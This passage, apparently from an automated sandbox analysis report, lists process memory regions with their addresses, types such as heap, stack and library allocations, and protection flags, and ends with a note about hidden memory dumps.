stack
|
page read and write
|
||
294E6C90000
|
direct allocation
|
page read and write
|
||
1C68B6E2000
|
heap
|
page read and write
|
||
24AAF1F2000
|
trusted library allocation
|
page read and write
|
||
14AB000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
1C68B680000
|
heap
|
page read and write
|
||
1C68B72B000
|
heap
|
page read and write
|
||
2244CD59000
|
heap
|
page read and write
|
||
22C4F762000
|
heap
|
page read and write
|
||
24ABDBC2000
|
trusted library allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
A02000
|
heap
|
page read and write
|
||
24AC5779000
|
heap
|
page read and write
|
||
22C51ABF000
|
heap
|
page read and write
|
||
3C0000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
2244CD49000
|
heap
|
page read and write
|
||
1C68B752000
|
heap
|
page read and write
|
||
1C68D0A0000
|
direct allocation
|
page read and write
|
||
22C4F6F3000
|
heap
|
page read and write
|
||
24AC59A0000
|
trusted library allocation
|
page read and write
|
||
1DEADF90000
|
heap
|
page read and write
|
||
79F667E000
|
stack
|
page read and write
|
||
7FF818097000
|
trusted library allocation
|
page read and write
|
||
24ABE70A000
|
trusted library allocation
|
page read and write
|
||
7FF818220000
|
trusted library allocation
|
page read and write
|
||
406000
|
unkown
|
page readonly
|
||
953000
|
heap
|
page read and write
|
||
24AB0FCF000
|
trusted library allocation
|
page read and write
|
||
22C4ED97000
|
trusted library allocation
|
page read and write
|
||
7C1000
|
trusted library allocation
|
page read and write
|
||
22C4F727000
|
heap
|
page read and write
|
||
24AACEE5000
|
heap
|
page read and write
|
||
94C000
|
heap
|
page read and write
|
||
8CE000
|
stack
|
page read and write
|
||
1C68D060000
|
direct allocation
|
page read and write
|
||
22C51AB9000
|
heap
|
page read and write
|
||
24AC5832000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
79F6879000
|
stack
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
2244CD61000
|
heap
|
page read and write
|
||
1C68D0C0000
|
direct allocation
|
page read and write
|
||
5E22F3F000
|
stack
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
24AAB4E4000
|
heap
|
page read and write
|
||
7FF8180D0000
|
trusted library allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
2DDE000
|
stack
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
7FF818250000
|
trusted library allocation
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
24AC5970000
|
trusted library allocation
|
page read and write
|
||
2244CD22000
|
heap
|
page read and write
|
||
24AACF65000
|
heap
|
page read and write
|
||
22C51AE6000
|
heap
|
page read and write
|
||
22C51ACD000
|
heap
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
1DEADF60000
|
trusted library allocation
|
page read and write
|
||
2244CD32000
|
heap
|
page read and write
|
||
1C68B5A0000
|
remote allocation
|
page read and write
|
||
24AAB469000
|
heap
|
page read and write
|
||
1C68D150000
|
heap
|
page read and write
|
||
1C68D03D000
|
direct allocation
|
page read and write
|
||
707000
|
heap
|
page read and write
|
||
18028D40000
|
heap
|
page read and write
|
||
2244CCEA000
|
heap
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
294E52F6000
|
heap
|
page read and write
|
||
4A9EF4F000
|
stack
|
page read and write
|
||
22C4ED95000
|
trusted library allocation
|
page read and write
|
||
1C68B6E1000
|
heap
|
page read and write
|
||
6A7000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
2244CD53000
|
heap
|
page read and write
|
||
24ABD258000
|
trusted library allocation
|
page read and write
|
||
B0AE5FE000
|
stack
|
page read and write
|
||
24ABE6CA000
|
trusted library allocation
|
page read and write
|
||
1C68B72E000
|
heap
|
page read and write
|
||
22C51AC0000
|
heap
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
38A7000
|
trusted library allocation
|
page read and write
|
||
1C68D023000
|
direct allocation
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
2244CD22000
|
heap
|
page read and write
|
||
2E2F000
|
stack
|
page read and write
|
||
1DEADB60000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
1C68B72B000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
24AB0DA9000
|
trusted library allocation
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
22C4F727000
|
heap
|
page read and write
|
||
294E5298000
|
heap
|
page read and write
|
||
6C2000
|
heap
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
1C68B6CA000
|
heap
|
page read and write
|
||
A9E000
|
stack
|
page read and write
|
||
ADE000
|
stack
|
page read and write
|
||
5E2303B000
|
stack
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
22C51ACD000
|
heap
|
page read and write
|
||
1DEADF99000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
24AC5540000
|
trusted library allocation
|
page read and write
|
||
24AAB4A2000
|
heap
|
page read and write
|
||
24AC5838000
|
heap
|
page read and write
|
||
294E8090000
|
direct allocation
|
page read and write
|
||
24AC56F2000
|
trusted library allocation
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
1C68B72E000
|
heap
|
page read and write
|
||
24ABE14A000
|
trusted library allocation
|
page read and write
|
||
294E52BA000
|
heap
|
page read and write
|
||
22C4EDD0000
|
heap
|
page readonly
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
37F0000
|
trusted library allocation
|
page read and write
|
||
2244CD7A000
|
heap
|
page read and write
|
||
2244CD51000
|
heap
|
page read and write
|
||
9C3000
|
heap
|
page read and write
|
||
24AB0EC1000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
1DEADD79000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
22C4F743000
|
heap
|
page read and write
|
||
24ABDB8D000
|
trusted library allocation
|
page read and write
|
||
22C4F75A000
|
heap
|
page read and write
|
||
6B9000
|
heap
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
2244CD49000
|
heap
|
page read and write
|
||
22C4ED91000
|
trusted library allocation
|
page read and write
|
||
2244CD73000
|
heap
|
page read and write
|
||
1DEADEF0000
|
heap
|
page readonly
|
||
1C68B6DC000
|
heap
|
page read and write
|
||
24ABD1F1000
|
trusted library allocation
|
page read and write
|
||
2244CD49000
|
heap
|
page read and write
|
||
24AC5773000
|
heap
|
page read and write
|
||
1C68B6D7000
|
heap
|
page read and write
|
||
294E52A4000
|
heap
|
page read and write
|
||
24AC5540000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
1C68B6C0000
|
heap
|
page read and write
|
||
1000FC000
|
stack
|
page read and write
|
||
355F000
|
stack
|
page read and write
|
||
2244CD26000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
2244CD16000
|
heap
|
page read and write
|
||
22C51ACD000
|
heap
|
page read and write
|
||
1C68B72E000
|
heap
|
page read and write
|
||
1C68E510000
|
direct allocation
|
page read and write
|
||
24AACE36000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
294E52D1000
|
heap
|
page read and write
|
||
7FF8180F0000
|
trusted library allocation
|
page read and write
|
||
7FF817EB3000
|
trusted library allocation
|
page execute and read and write
|
||
24AC56E0000
|
trusted library allocation
|
page read and write
|
||
24AAB7C0000
|
trusted library allocation
|
page read and write
|
||
1DEADF10000
|
trusted library allocation
|
page read and write
|
||
24AB0E51000
|
trusted library allocation
|
page read and write
|
||
4A9E6FE000
|
stack
|
page read and write
|
||
79F63BF000
|
stack
|
page read and write
|
||
1C68B6D7000
|
heap
|
page read and write
|
||
2244CCCA000
|
heap
|
page read and write
|
||
1C68B6C6000
|
heap
|
page read and write
|
||
24ABDD7A000
|
trusted library allocation
|
page read and write
|
||
1001FF000
|
stack
|
page read and write
|
||
86D000
|
trusted library allocation
|
page read and write
|
||
2244CD4F000
|
heap
|
page read and write
|
||
3FEC000
|
trusted library allocation
|
page read and write
|
||
294E6BEF000
|
direct allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
24ABE34A000
|
trusted library allocation
|
page read and write
|
||
420000
|
trusted library allocation
|
page read and write
|
||
22C4EC30000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
294E5341000
|
heap
|
page read and write
|
||
1C68B746000
|
heap
|
page read and write
|
||
2E76000
|
trusted library allocation
|
page read and write
|
||
1C68B730000
|
heap
|
page read and write
|
||
2D9E000
|
stack
|
page read and write
|
||
1DEADD53000
|
heap
|
page read and write
|
||
24AAD00A000
|
heap
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
1196000
|
heap
|
page read and write
|
||
952000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
9BA000
|
heap
|
page read and write
|
||
7C0000
|
trusted library allocation
|
page read and write
|
||
24AC5CD2000
|
unkown
|
page read and write
|
||
4A9E9FE000
|
stack
|
page read and write
|
||
22C51AE6000
|
heap
|
page read and write
|
||
294E5290000
|
heap
|
page read and write
|
||
24AC56FA000
|
trusted library allocation
|
page read and write
|
||
24AC5692000
|
trusted library allocation
|
page read and write
|
||
294E52C7000
|
heap
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
24AC56F1000
|
trusted library allocation
|
page read and write
|
||
22C51ABC000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
294E52CE000
|
heap
|
page read and write
|
||
22C4F751000
|
heap
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
D0E000
|
stack
|
page read and write
|
||
24AB04CD000
|
trusted library allocation
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
2244CD7E000
|
heap
|
page read and write
|
||
24AAB4BC000
|
heap
|
page read and write
|
||
1DEAEA90000
|
trusted library allocation
|
page read and write
|
||
5E22BFE000
|
stack
|
page read and write
|
||
3FD4000
|
trusted library allocation
|
page read and write
|
||
2244CD23000
|
heap
|
page read and write
|
||
24AC56E0000
|
trusted library allocation
|
page read and write
|
||
A02000
|
heap
|
page read and write
|
||
24AACE70000
|
trusted library allocation
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
294E52F1000
|
heap
|
page read and write
|
||
24AACFED000
|
heap
|
page read and write
|
||
24AACFED000
|
heap
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
24ABE2E2000
|
trusted library allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
4A9DF87000
|
stack
|
page read and write
|
||
2244CC80000
|
heap
|
page read and write
|
||
7FF818170000
|
trusted library allocation
|
page read and write
|
||
22C51ABF000
|
heap
|
page read and write
|
||
24AC5980000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
19C881E0000
|
heap
|
page read and write
|
||
5E23A0E000
|
stack
|
page read and write
|
||
7FF818160000
|
trusted library allocation
|
page read and write
|
||
1C68B870000
|
heap
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
24ABE532000
|
trusted library allocation
|
page read and write
|
||
22C4F741000
|
heap
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
294E5100000
|
heap
|
page read and write
|
||
22C4F743000
|
heap
|
page read and write
|
||
24ABDB9A000
|
trusted library allocation
|
page read and write
|
||
24AC56F4000
|
trusted library allocation
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
24AC56C0000
|
trusted library allocation
|
page read and write
|
||
1C68B6B4000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
24AAB440000
|
trusted library allocation
|
page read and write
|
||
2244CD7D000
|
heap
|
page read and write
|
||
79F66F9000
|
stack
|
page read and write
|
||
22C4F762000
|
heap
|
page read and write
|
||
24AACF7A000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
2244D026000
|
heap
|
page read and write
|
||
1456000
|
heap
|
page read and write
|
||
7FF817F96000
|
trusted library allocation
|
page execute and read and write
|
There are 1211 hidden memdumps, click here to show them.